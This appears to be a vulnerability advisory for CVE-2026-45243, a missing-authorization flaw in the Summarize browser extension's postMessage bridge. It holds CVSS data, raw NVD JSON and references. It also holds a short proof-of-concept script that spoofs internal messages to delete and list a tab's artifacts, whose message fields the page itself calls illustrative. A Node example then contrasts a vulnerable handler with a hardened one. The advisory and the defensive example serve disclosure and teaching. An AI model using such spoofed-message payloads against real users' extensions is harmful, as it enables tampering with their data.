Security Vulnerability Report
CVE-2026-45243 CVSS 6.1 MEDIUM

Published: 2026-05-18 19:16:28
Last Modified: 2026-05-19 01:34:19

Description

Summarize prior to 0.15.1 contains a missing authorization vulnerability in the content script window.postMessage bridge that allows malicious pages to perform unauthorized operations on automation artifacts. Attackers can simulate runtime messages with spoofed sender identifiers to list, read, create, overwrite, or delete automation artifacts scoped to the affected tab without proper authorization checks.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSS 4.0 (secondary score from the CNA)
5.3 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
Weakness
CWE-862 Missing Authorization

Configurations (Affected Products)

cpe:2.3:a:steipete:summarize:*:*:*:*:*:*:*:* - VULNERABLE
Summarize < 0.15.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2026-45243: Missing Authorization in Summarize Extension
// This script demonstrates how a malicious page could spoof messages to manipulate artifacts.
// Target the vulnerable content script via window.postMessage.
// Caveat: the message shape below (sender, type, action, data.id) is illustrative and was not
// taken from the vulnerable content script; the real field names and action names must be
// read from the affected version's source before this can be expected to do anything.
function exploitSummarize() {
  console.log("[+] Attempting to exploit CVE-2026-45243...");

  // Construct a malicious payload spoofing the internal sender identifier
  const maliciousPayload = {
    sender: "summarize-internal", // Spoofed identifier
    type: "COMMAND",              // Message type assumed to be accepted by the bridge
    action: "DELETE_ARTIFACT",    // Unauthorized action
    data: {
      id: "target_artifact_id"    // Target artifact
    }
  };

  // Send the message to every listener in this window, the content script among them.
  // Page scripts and the content script share the same window, so a listener that keys
  // trust on a field inside the message cannot tell this from the extension's own traffic.
  window.postMessage(maliciousPayload, "*");

  // Attempt to list artifacts to verify access
  const listPayload = {
    sender: "summarize-internal",
    type: "COMMAND",
    action: "LIST_ARTIFACTS"
  };
  window.postMessage(listPayload, "*");
}

// Execute the exploit
exploitSummarize();
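The PoC above only shows the sending side. As an added example (it is not Summarize's code and is not taken from the patch), the following Node-runnable JavaScript models the receiving side of such a bridge: a background message handler that authorizes on a "sender" tag carried inside the message, beside one that authorizes on the sender object the browser itself attaches to a chrome.runtime.onMessage delivery. The message schema (sender, action, artifactId, body, tabId), the extension id, the sample artifact store and the two simulated sender objects are all assumptions made for illustration.

```javascript
// Added example, not Summarize's code. Models the background-side handler of a
// Chrome extension that manages per-tab "automation artifacts". Message schema,
// extension id and store layout are assumptions made for illustration.

const EXTENSION_ID = "abcdefghijklmnopabcdefghijklmnop"; // assumed extension id
const EXTENSION_ORIGIN = `chrome-extension://${EXTENSION_ID}`;

// In-memory stand-in for the per-tab artifact store (constructed sample data).
function makeStore() {
  return { 1: { "art-1": "click #login, type user", "art-2": "scroll, capture" } };
}

function applyAction(store, tabId, message) {
  const tab = store[tabId] || (store[tabId] = {});
  switch (message.action) {
    case "LIST_ARTIFACTS":  return Object.keys(tab);
    case "READ_ARTIFACT":   return tab[message.artifactId] ?? null;
    case "WRITE_ARTIFACT":  tab[message.artifactId] = message.body; return true;
    case "DELETE_ARTIFACT": return delete tab[message.artifactId];
    default: throw new Error(`unknown action ${message.action}`);
  }
}

// VULNERABLE: trust is keyed on a string inside the message. Any page script
// whose postMessage the content-script bridge relays can set that string.
function vulnerableHandler(message, sender, store) {
  if (message.sender !== "summarize-internal") {
    return { ok: false, reason: "unexpected sender tag" };
  }
  const tabId = sender.tab ? sender.tab.id : message.tabId;
  return { ok: true, result: applyAction(store, tabId, message) };
}

// HARDENED: authorize on the runtime-supplied sender object, which the browser
// fills in and web content cannot forge. Artifact CRUD is accepted only from
// the extension's own pages; a content script (sender.tab set, sender.url equal
// to the web page) is refused regardless of what the message claims.
function hardenedHandler(message, sender, store) {
  if (sender.id !== EXTENSION_ID) {
    return { ok: false, reason: "message not from this extension" };
  }
  const fromExtensionPage =
    !sender.tab && typeof sender.url === "string" &&
    sender.url.startsWith(`${EXTENSION_ORIGIN}/`);
  if (!fromExtensionPage) {
    return { ok: false, reason: "artifact operations not allowed from content scripts" };
  }
  if (!Number.isInteger(message.tabId)) {
    return { ok: false, reason: "missing tab id" };
  }
  return { ok: true, result: applyAction(store, message.tabId, message) };
}

// Simulated runtime: the sender chrome.runtime.onMessage would pass when the
// sendMessage call originates from a content script in tab 1 on a web page...
const contentScriptSender = { id: EXTENSION_ID, tab: { id: 1 }, url: "https://attacker.example/" };
// ...and when it originates from the extension's own popup page.
const popupSender = { id: EXTENSION_ID, url: `${EXTENSION_ORIGIN}/popup.html` };

// Constructed payload a malicious page posts with window.postMessage; a bridge
// that relays page messages verbatim hands it to the handler unchanged.
const spoofed = { sender: "summarize-internal", action: "DELETE_ARTIFACT", artifactId: "art-1" };

function attack(handler) {
  const store = makeStore();
  const outcome = handler(spoofed, contentScriptSender, store);
  return { outcome, remaining: Object.keys(store[1]) };
}

function legitimate(handler) {
  const store = makeStore();
  return handler({ action: "LIST_ARTIFACTS", tabId: 1 }, popupSender, store);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable:", JSON.stringify(attack(vulnerableHandler)));
  console.log("hardened:  ", JSON.stringify(attack(hardenedHandler)));
  console.log("popup:     ", JSON.stringify(legitimate(hardenedHandler)));
}
```

Run with node: the first line shows the spoofed DELETE removing art-1 through the vulnerable handler, the second shows the same message refused with art-1 intact, the third shows the popup's own LIST still served. The general point is that a page script controls every field of a message it posts, and anything a content script forwards inherits that, so authorization has to rest on the sender fields the browser sets (id, url, tab) and privileged operations should not be reachable from content-script senders at all.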

References

https://github.com/steipete/summarize/commit/357544063af535bd574752622f9eb94be33ee5fd (Patch)
https://github.com/steipete/summarize/pull/222 (Exploit, Issue Tracking, Patch)
https://github.com/steipete/summarize/releases/tag/v0.15.2 (Release Notes)
https://www.vulncheck.com/advisories/summarize-browser-extension-missing-authorization-via-content-script (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45243", "sourceIdentifier": "[email protected]", "published": "2026-05-18T19:16:28.387", "lastModified": "2026-05-19T01:34:18.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Summarize prior to 0.15.1 contains a missing authorization vulnerability in the content script window.postMessage bridge that allows malicious pages to perform unauthorized operations on automation artifacts. Attackers can simulate runtime messages with spoofed sender identifiers to list, read, create, overwrite, or delete automation artifacts scoped to the affected tab without proper authorization checks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:steipete:summarize:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.15.1", "matchCriteriaId": "FDA6FF18-A9BB-4892-B428-AB85BB58E16A"}]}]}], "references": [{"url": "https://github.com/steipete/summarize/commit/357544063af535bd574752622f9eb94be33ee5fd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/steipete/summarize/pull/222", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/steipete/summarize/releases/tag/v0.15.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/summarize-browser-extension-missing-authorization-via-content-script", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}